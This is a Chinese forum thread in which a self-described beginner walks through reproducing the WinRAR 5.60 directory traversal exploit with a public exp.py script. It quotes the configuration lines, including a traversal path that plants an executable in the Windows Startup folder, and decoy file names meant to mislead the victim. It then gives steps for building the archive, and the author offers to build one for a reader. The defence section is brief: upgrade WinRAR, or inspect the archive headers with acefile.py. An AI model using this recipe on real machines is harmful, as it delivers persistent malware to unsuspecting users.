论WinRAR的目录穿越漏洞的实现方法及防范

python无名氏

PS:本人纯新手，不喜或有错误勿喷！(当然有错误如果心平气和的沟通也是可以的)
复现工具：
1、
2、Python3环境
3、winrar 5.60版本

开始复现：
具体实现原理为了节省时间不说了，有兴趣的可以上网查。
来看看exp.py中的这一段：

1. # The archive filename you want
   
2. rar_filename = "test.rar"
   
3. # The evil file you want to run
   
4. evil_filename = "calc.exe"
   
5. # The decompression path you want, such shown below
   
6. target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
   
7. # Other files to be displayed when the victim opens the winrar
   
8. # filename_list=[]
   
9. filename_list = ["rick.txt", "roll.txt"]

复制代码

这是具体配置信息，这里只讲复现，不讲代码。
配置如下：
rar_filename:输出RAR文件名，不要有中文
evil_filename:添加的恶意文件(同目录)
target_filename:穿越的目录，非必要别碰她(这一段可以无需用户名直接释放到启动项目录)
filename_list:添加到压缩包里的迷惑文件
配置完成之后就可以打开命令行，cd到漏洞复现目录，然后python exp.py就行了
输出[+] Evil archive file %s generated successfully !就代表成功了
在同目录下应该生成了rar_filename.rar。
如果有其他报错带着报错放在评论区
生成完毕后就可以把压缩包改成中文名了，
拿到装了winrar 5.60的电脑上解压然后重启成功运行你设定的文件
复现完毕
不要拿去做坏事！
(插一嘴，如果你选的文件太大，那压缩包也会大得离谱，完全没有压缩你选的恶意文件)
防范措施（刚忘了快补上！）：
升级到最新版本。(好像有点太水了，但没事！我脸皮厚)
对了，在更新一条，EXP所在的目录里有一个acefile.py，这个也可以防范，用法：acefile.py --header <需要查验是否存在漏洞的RAR文件>，然后就能看到具体数据了，能看到他将恶意文件释放到了哪和释放的恶意文件的名字

mifanu

必需要有python么。用cmd或者批处理压缩行不？

python无名氏

mifanu 发表于 2022-12-21 17:14
必需要有python么。在cmd下行不行？

目前Github上公开的POC就只有这个了要是你愿意的话我可以帮你压缩

mifanu

python无名氏 发表于 2022-12-21 17:15
目前Github上公开的POC就只有这个了要是你愿意的话我可以帮你压缩

没事。我慢慢研究下。